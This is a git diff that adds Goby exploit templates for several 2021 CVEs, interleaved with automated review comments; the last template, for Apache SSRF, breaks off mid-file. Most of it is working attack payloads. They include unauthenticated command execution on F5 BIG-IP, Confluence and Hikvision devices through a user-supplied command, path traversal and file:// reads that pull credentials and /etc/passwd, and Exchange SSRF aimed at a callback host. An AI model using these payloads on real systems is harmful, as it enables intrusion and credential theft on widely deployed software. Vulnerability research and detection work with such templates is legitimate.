rename from 2021/CVE-2021-22214/poc/xray/CVE-2021-22214.yaml
rename to 2021/CVE-2021-22214/poc/xray/CVE-2021-22214.yml
diff --git a/2021/CVE-2021-22986/poc/goby/F5_BIG_IP_RCE_CVE_2021_22986_exp.json b/2021/CVE-2021-22986/poc/goby/F5_BIG_IP_RCE_CVE_2021_22986_exp.json
new file mode 100644
index 000000000..52c89cd18
--- /dev/null
+++ b/2021/CVE-2021-22986/poc/goby/F5_BIG_IP_RCE_CVE_2021_22986_exp.json
@@ -0,0 +1,85 @@
+{
+ "Name": "F5 BIG-IP代码执行漏洞(CVE-2021-22986)exp",
+ "Level": "3",
+ "Tags": [
+ "RCE"
+ ],
+ "GobyQuery": "product=\"F5-BIGIP\"",
+ "Description": "F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。",
+ "Product": "F5 Big-IP",
+ "Homepage": "",
+ "Author": "k3vi_07@icloud.com",
+ "Impact": "F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。
",
+ "Recommandation": "undefined
",
+ "References": [
+ "https://www.freebuf.com/vuls/268254.html"
+ ],
+ "HasExp": true,
+ "ExpParams":[
+ {
+ "name":"cmd",
+ "type":"input",
+ "value":"whoami",
+ "show":""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/mgmt/tm/util/bash",
+ "follow_redirect": true,
+ "header": {
+ "Authorization": "Basic YWRtaW46QVNhc1M=",
+ "X-F5-Auth-Token": ""
+ },
+ "data_type": "text",
+ "data": "{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo tsxts|base64'\"}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "dHN4dHMK",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/mgmt/tm/util/bash",
+ "follow_redirect": false,
+ "header": {
+ "Authorization": "Basic YWRtaW46QVNhc1M=",
+ "X-F5-Auth-Token": ""
+ },
+ "data_type": "text",
+ "data": "{\"command\":\"run\",\"utilCmdArgs\":\"-c {{{cmd}}}\"}"
+ },
+
+ "SetVariable": [
+ "output|lastbody|regex|commandResult\".\"(.*)\"}"
+ ]
+ }
+ ],
+ "PostTime": "2021-04-01 16:51:54",
+ "GobyVersion": "1.8.255"
+}
\ No newline at end of file
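Review bot: The `ExploitSteps` step has a blank line where every other entry in this commit (and this file's own `ScanSteps`) carries a `ResponseTest`, so any response — error page or auth rejection included — is handed straight to the `output` regex and reported as a result; adding the same `$code == 200` group used in `ScanSteps` keeps the two steps consistent. For operators: the scan step is not a fingerprint, it submits a real command (`echo tsxts|base64`) through `/mgmt/tm/util/bash` with a hard-coded `Authorization` header, so running this entry is active command execution on the target and will show up as such in the device's REST request logs. `Homepage` is empty and the Description gives no fixed release, so a hit leaves the reader without a remediation pointer.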
diff --git a/2021/CVE-2021-22986/poc/xray/CVE-2021-22986.yaml b/2021/CVE-2021-22986/poc/xray/CVE-2021-22986.yml
similarity index 100%
rename from 2021/CVE-2021-22986/poc/xray/CVE-2021-22986.yaml
rename to 2021/CVE-2021-22986/poc/xray/CVE-2021-22986.yml
diff --git a/2021/CVE-2021-25282/poc/xray/CVE-2021-25282.yaml b/2021/CVE-2021-25282/poc/xray/CVE-2021-25282.yml
similarity index 100%
rename from 2021/CVE-2021-25282/poc/xray/CVE-2021-25282.yaml
rename to 2021/CVE-2021-25282/poc/xray/CVE-2021-25282.yml
diff --git a/2021/CVE-2021-26084/poc/goby/CVE-2021-26084.json b/2021/CVE-2021-26084/poc/goby/CVE-2021-26084.json
new file mode 100644
index 000000000..6dc831799
--- /dev/null
+++ b/2021/CVE-2021-26084/poc/goby/CVE-2021-26084.json
@@ -0,0 +1,82 @@
+{
+ "Name": "Confluence RCE(CVE-2021-26084)",
+ "Level": "3",
+ "Tags": [
+ "RCE"
+ ],
+ "GobyQuery": "product=\"Confluence\"",
+ "Description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.",
+ "Product": "Atlassian Confluence",
+ "Homepage": "https://www.atlassian.com/zh/software/confluence",
+ "Author": "aetkrad",
+ "Impact": "allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance
",
+ "Recommandation": "",
+ "References": [
+ "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084"
+ ],
+ "HasExp":true,
+ "ExpParams":[
+ {
+ "name":"cmd",
+ "type":"input",
+ "value":"whoami",
+ "show":""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/pages/doenterpagevariables.action",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var isWin=java.lang.System.getProperty(\\u0027os.name\\u0027).toLowerCase().contains(\\u0027win\\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\\u0027cmd.exe\\u0027,\\u0027/c\\u0027,\\u0027echo workwork\\u0027]);}else{p.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027echo workwork\\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\\u0022)}%2b\\u0027"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "workwork",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps":[
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/pages/doenterpagevariables.action",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var isWin=java.lang.System.getProperty(\\u0027os.name\\u0027).toLowerCase().contains(\\u0027win\\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\\u0027cmd.exe\\u0027,\\u0027/c\\u0027,\\u0027{{{cmd}}}\\u0027]);}else{p.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027{{{cmd}}}\\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\\u0022)}%2b\\u0027"
+ },
+ "SetVariable": [
+ "output|lastbody|regex|value=\"{([\\s\\S]*)=null}\""
+ ]
+ }
+ ],
+ "PostTime": "2021-10-27 13:33:02",
+ "GobyVersion": "1.8.294"
+}
\ No newline at end of file
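Review bot: `Recommandation` is left empty even though the Description already enumerates the fixed releases, so the remediation can be filled in directly: `"Recommendation": "Upgrade Confluence Server/Data Center to 6.13.23, 7.4.11, 7.11.6 or 7.12.5 (or later) per the Description.",`. The `Impact` value ends with a raw line break inside the string, which strict JSON parsers reject. `"HasExp":true`, `"ExpParams":[` and `"ExploitSteps":[` omit the space after the colon that the rest of the file uses; a single pass through a JSON formatter would normalise that.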
diff --git a/2021/CVE-2021-26084/poc/xray/CVE-2021-26084.yaml b/2021/CVE-2021-26084/poc/xray/CVE-2021-26084.yml
similarity index 100%
rename from 2021/CVE-2021-26084/poc/xray/CVE-2021-26084.yaml
rename to 2021/CVE-2021-26084/poc/xray/CVE-2021-26084.yml
diff --git a/2021/CVE-2021-26085/poc/xray/CVE-2021-26085.yaml b/2021/CVE-2021-26085/poc/xray/CVE-2021-26085.yml
similarity index 100%
rename from 2021/CVE-2021-26085/poc/xray/CVE-2021-26085.yaml
rename to 2021/CVE-2021-26085/poc/xray/CVE-2021-26085.yml
diff --git a/2021/CVE-2021-26855/poc/xray/CVE-2021-26855.yaml b/2021/CVE-2021-26855/poc/xray/CVE-2021-26855.yml
similarity index 100%
rename from 2021/CVE-2021-26855/poc/xray/CVE-2021-26855.yaml
rename to 2021/CVE-2021-26855/poc/xray/CVE-2021-26855.yml
diff --git "a/2021/CVE-2021-26885/poc/goby/Microsoft Exchange SSRF\346\274\217\346\264\236 CVE-2021-26885.json" "b/2021/CVE-2021-26885/poc/goby/Microsoft Exchange SSRF\346\274\217\346\264\236 CVE-2021-26885.json"
new file mode 100644
index 000000000..d796c6570
--- /dev/null
+++ "b/2021/CVE-2021-26885/poc/goby/Microsoft Exchange SSRF\346\274\217\346\264\236 CVE-2021-26885.json"
@@ -0,0 +1,82 @@
+{
+ "Name": "Microsoft Exchange SSRF漏洞 CVE-2021-26885",
+ "Level": "1",
+ "Tags": [
+ "SSRF"
+ ],
+ "GobyQuery": "(app=\"Microsoft-Exchange\" || title=\"Outlook\")",
+ "Description": "Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证",
+ "Product": "Exchange",
+ "Homepage": "microsoft.com",
+ "Author": "PeiQi",
+ "Impact": "🐏
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Dnslog",
+ "type": "input",
+ "value": "xxx.dnslog.cn",
+ "show": ""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/ecp/PeiQi.js",
+ "follow_redirect": false,
+ "header": {
+ "Cookie": "X-BEResource=peiqi_wiki/api/endpoint#~1; X-AnonResource=true"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "NegotiateSecurityContext",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/owa/auth/PeiQi.js",
+ "follow_redirect": false,
+ "header": {
+ "Cookie": "X-AnonResource=true; X-AnonResource-Backend={{{Dnslog}}}/ecp/default.flt?~3; X-BEResource={{{Dnslog}}}/owa/auth/logon.aspx?~3;"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-03-13 14:34:38",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
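Review bot: The CVE identifier in this entry is inconsistent: the Description says the issue is `CVE-2021-26855` (the Exchange SSRF), while the `Name`, the filename and the directory use `CVE-2021-26885`, and this same commit already shows an existing `2021/CVE-2021-26855/poc/xray/` tree. That looks like a digit transposition; the entry should probably live under `2021/CVE-2021-26855/poc/goby/` with `"Name": "Microsoft Exchange SSRF漏洞 CVE-2021-26855",` — worth confirming before merging, since a misfiled ID breaks lookups by CVE. `Impact` is the placeholder `🐏` plus a raw line break; the Description already has the substance, e.g. `"Impact": "Unauthenticated SSRF: arbitrary HTTP requests issued with the Exchange server's identity, internal network scanning and disclosure of Exchange user information.",`. `Level` is `1` here while the other SSRF/LFI entries in this commit use `2` — I cannot see the scale definition, but an unauthenticated SSRF against Exchange seems underrated relative to its siblings.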
diff --git a/2021/CVE-2021-26885/poc/nuclei/wait_to_be_added b/2021/CVE-2021-26885/poc/nuclei/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/nuclei/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-26885/poc/oneliner/wait_to_be_added b/2021/CVE-2021-26885/poc/oneliner/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/oneliner/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-26885/poc/others/wait_to_be_added b/2021/CVE-2021-26885/poc/others/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/others/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-26885/poc/pocsuite2/wait_to_be_added b/2021/CVE-2021-26885/poc/pocsuite2/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/pocsuite2/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-26885/poc/pocsuite3/wait_to_be_added b/2021/CVE-2021-26885/poc/pocsuite3/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/pocsuite3/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-26885/poc/xray/wait_to_be_added b/2021/CVE-2021-26885/poc/xray/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/xray/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-28164/poc/xray/CVE-2021-28164.yaml b/2021/CVE-2021-28164/poc/xray/CVE-2021-28164.yml
similarity index 100%
rename from 2021/CVE-2021-28164/poc/xray/CVE-2021-28164.yaml
rename to 2021/CVE-2021-28164/poc/xray/CVE-2021-28164.yml
diff --git a/2021/CVE-2021-29622/poc/xray/CVE-2021-29622.yaml b/2021/CVE-2021-29622/poc/xray/CVE-2021-29622.yml
similarity index 100%
rename from 2021/CVE-2021-29622/poc/xray/CVE-2021-29622.yaml
rename to 2021/CVE-2021-29622/poc/xray/CVE-2021-29622.yml
diff --git a/2021/CVE-2021-3019/poc/goby/Lanproxy_Arbitrary_File_Read_CVE_2021_3019.json b/2021/CVE-2021-3019/poc/goby/Lanproxy_Arbitrary_File_Read_CVE_2021_3019.json
new file mode 100644
index 000000000..14c8b3315
--- /dev/null
+++ b/2021/CVE-2021-3019/poc/goby/Lanproxy_Arbitrary_File_Read_CVE_2021_3019.json
@@ -0,0 +1,85 @@
+{
+ "Name": "Lanproxy_Arbitrary_File_Read_CVE-2021-3019",
+ "Level": "2",
+ "Tags": [
+ "目录遍历"
+ ],
+ "GobyQuery": "header=\"Server: LPS-0.1\"",
+ "Description": "Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。",
+ "Product": "Lanproxy 0.1",
+ "Homepage": "https://github.com/ffay/lanproxy",
+ "Author": "PeiQi",
+ "Impact": "咩咩咩🐑
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Filename",
+ "type": "input",
+ "value": "/../conf/config.properties",
+ "show": ""
+ },
+ {
+ "name": "/etc/passwd",
+ "type": "textarea",
+ "value": "/../../../../../../../../../../etc/passwd",
+ "show": ""
+ }
+
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/../conf/config.properties",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "server.ssl",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "{{{Filename}}}",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-01-21 20:51:57",
+ "GobyVersion": "1.8.230"
+}
\ No newline at end of file
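Review bot: The second `ExpParams` entry (`"name": "/etc/passwd"`, type `textarea`) is never referenced — `ExploitSteps` substitutes only `{{{Filename}}}` — so it is dead configuration, and its `name` is a path rather than a parameter identifier; removing the entry leaves the behaviour unchanged and the form cleaner. `Impact` is the placeholder `咩咩咩🐑` with a raw line break; the Description already states the consequence, e.g. `"Impact": "Directory traversal allows reading arbitrary files such as conf/config.properties, exposing the credentials used for internal network connections.",`. There is also a stray blank line before the closing `],` of `ExpParams`, and `Tags` uses `目录遍历` where the other entries in this commit tag the same class as `lfi`, which may matter if tags are used for filtering.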
diff --git a/2021/CVE-2021-3019/poc/xray/CVE-2021-3019.yaml b/2021/CVE-2021-3019/poc/xray/CVE-2021-3019.yml
similarity index 100%
rename from 2021/CVE-2021-3019/poc/xray/CVE-2021-3019.yaml
rename to 2021/CVE-2021-3019/poc/xray/CVE-2021-3019.yml
diff --git a/2021/CVE-2021-3129/poc/xray/CVE-2021-3129.yaml b/2021/CVE-2021-3129/poc/xray/CVE-2021-3129.yml
similarity index 100%
rename from 2021/CVE-2021-3129/poc/xray/CVE-2021-3129.yaml
rename to 2021/CVE-2021-3129/poc/xray/CVE-2021-3129.yml
diff --git a/2021/CVE-2021-31602/poc/xray/CVE-2021-31602.yaml b/2021/CVE-2021-31602/poc/xray/CVE-2021-31602.yml
similarity index 100%
rename from 2021/CVE-2021-31602/poc/xray/CVE-2021-31602.yaml
rename to 2021/CVE-2021-31602/poc/xray/CVE-2021-31602.yml
diff --git a/2021/CVE-2021-3223/poc/xray/CVE-2021-3223.yaml b/2021/CVE-2021-3223/poc/xray/CVE-2021-3223.yml
similarity index 100%
rename from 2021/CVE-2021-3223/poc/xray/CVE-2021-3223.yaml
rename to 2021/CVE-2021-3223/poc/xray/CVE-2021-3223.yml
diff --git a/2021/CVE-2021-33044/poc/xray/CVE-2021-33044.yaml b/2021/CVE-2021-33044/poc/xray/CVE-2021-33044.yml
similarity index 100%
rename from 2021/CVE-2021-33044/poc/xray/CVE-2021-33044.yaml
rename to 2021/CVE-2021-33044/poc/xray/CVE-2021-33044.yml
diff --git a/2021/CVE-2021-36260/poc/goby/CVE-2021-36260.json b/2021/CVE-2021-36260/poc/goby/CVE-2021-36260.json
new file mode 100644
index 000000000..d52468478
--- /dev/null
+++ b/2021/CVE-2021-36260/poc/goby/CVE-2021-36260.json
@@ -0,0 +1,112 @@
+{
+ "Name": "Hikvision RCE CVE-2021-36260",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "app=\"Hikvision-Cameras-and-Surveillance\"",
+ "Description": "攻击者利用该漏洞可以用无限制的root shell来完全控制设备,即使设备的所有者受限于有限的受保护shell(psh)。除了入侵IP摄像头外,还可以访问和攻击内部网络。\n该漏洞的利用并不需要用户交互,攻击者只需要访问http或HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。",
+ "Product": "hikvision",
+ "Homepage": "https://www.hikvision.com/cn/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html"
+ ],
+ "HasExp": false,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastheader|regex|"
+ ]
+ },
+ {
+ "Request": {
+ "method": "PUT",
+ "uri": "/SDK/webLanguage",
+ "follow_redirect": false,
+ "header": {
+ "X-Requested-With": "XMLHttpRequest",
+ "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "\n$(ls -l >webLib/c)",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/c",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-17 13:28:08",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
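Review bot: The second ScanSteps request (L3969-L3977, `PUT /SDK/webLanguage` with a `$(...)` body) is not a passive fingerprint check: a successful "scan" of this record executes a command on the device and writes a file that the third step then fetches, so verify mode already changes the target. Nothing in the record says so — `HasExp` is false and `ExpTips.Content` is empty — and a sentence there such as `Verification executes a command on the device and leaves a file under webLib/` would let an operator judge before running it. Separately, `Description` at L3923 is written in Chinese while the sibling records in this commit (CVE-2021-36749, CVE-2021-40438, CVE-2021-41277) are English; the CVE-2021-40539 record at L4280 has the same inconsistency, and an English summary alongside would keep the corpus searchable.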
diff --git a/2021/CVE-2021-36260/poc/xray/CVE-2021-36260.yaml b/2021/CVE-2021-36260/poc/xray/CVE-2021-36260.yml
similarity index 100%
rename from 2021/CVE-2021-36260/poc/xray/CVE-2021-36260.yaml
rename to 2021/CVE-2021-36260/poc/xray/CVE-2021-36260.yml
diff --git a/2021/CVE-2021-3654/poc/xray/CVE-2021-3654.yaml b/2021/CVE-2021-3654/poc/xray/CVE-2021-3654.yml
similarity index 100%
rename from 2021/CVE-2021-3654/poc/xray/CVE-2021-3654.yaml
rename to 2021/CVE-2021-3654/poc/xray/CVE-2021-3654.yml
diff --git a/2021/CVE-2021-36749/poc/goby/CVE-2021-36749.json b/2021/CVE-2021-36749/poc/goby/CVE-2021-36749.json
new file mode 100644
index 000000000..2ba9c656d
--- /dev/null
+++ b/2021/CVE-2021-36749/poc/goby/CVE-2021-36749.json
@@ -0,0 +1,104 @@
+{
+ "Name": "Apache Druid Abritrary File Read CVE-2021-36749",
+ "Level": "3",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "title=\"Apache Druid\"",
+ "Description": "In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.",
+ "Product": "Druid",
+ "Homepage": "https://druid.apache.org/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://mp.weixin.qq.com/s/1iGsy2KpiijihtJ3M2Tdzw"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "Path",
+ "Type": "input",
+ "Value": "/etc/passwd"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/druid/indexer/v1/sampler?for=connect",
+ "follow_redirect": false,
+ "header": {
+ "Accept": "application/json, text/plain, */*",
+ "Content-Type": "application/json;charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\"file:///etc/passwd\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\",\"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root:x:",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/druid/indexer/v1/sampler?for=connect",
+ "follow_redirect": false,
+ "header": {
+ "Accept": "application/json, text/plain, */*",
+ "Content-Type": "application/json;charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\"file://{{{Path}}}\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\",\"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-23 17:14:35",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
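Review bot: `Name` at L4044 misspells "Arbitrary" as `Abritrary`; the Name is what Goby shows in result listings and what people search for, so it should read `"Name": "Apache Druid Arbitrary File Read CVE-2021-36749"`. The only entry in `References` is a WeChat article, which is not a stable citation; the NVD record at https://nvd.nist.gov/vuln/detail/CVE-2021-36749 would anchor the `Description`, which reads like the advisory text copied verbatim.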
diff --git a/2021/CVE-2021-36749/poc/xray/CVE-2021-36749.yaml b/2021/CVE-2021-36749/poc/xray/CVE-2021-36749.yml
similarity index 100%
rename from 2021/CVE-2021-36749/poc/xray/CVE-2021-36749.yaml
rename to 2021/CVE-2021-36749/poc/xray/CVE-2021-36749.yml
diff --git a/2021/CVE-2021-40438/poc/goby/CVE-2021-40438.json b/2021/CVE-2021-40438/poc/goby/CVE-2021-40438.json
new file mode 100644
index 000000000..27e8d1ad2
--- /dev/null
+++ b/2021/CVE-2021-40438/poc/goby/CVE-2021-40438.json
@@ -0,0 +1,98 @@
+{
+ "Name": "Apache HTTP Server SSRF CVE-2021-40438",
+ "Level": "3",
+ "Tags": [
+ "ssrf"
+ ],
+ "GobyQuery": "(product=\"Apache-Web-Server\"||server=\"Apache\")",
+ "Description": "A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network",
+ "Product": "Apache-Web-Server",
+ "Homepage": "https://gobies.org/",
+ "Author": "aetkrad",
+ "Impact": "It allows remote attackers to access the content of internal network resources.
",
+ "Recommendation": "",
+ "References": [
+ "https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-40438#apache-http-server-2448-mod_proxy-ssrf-cve-2021-40438"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "cmd",
+ "Type": "input",
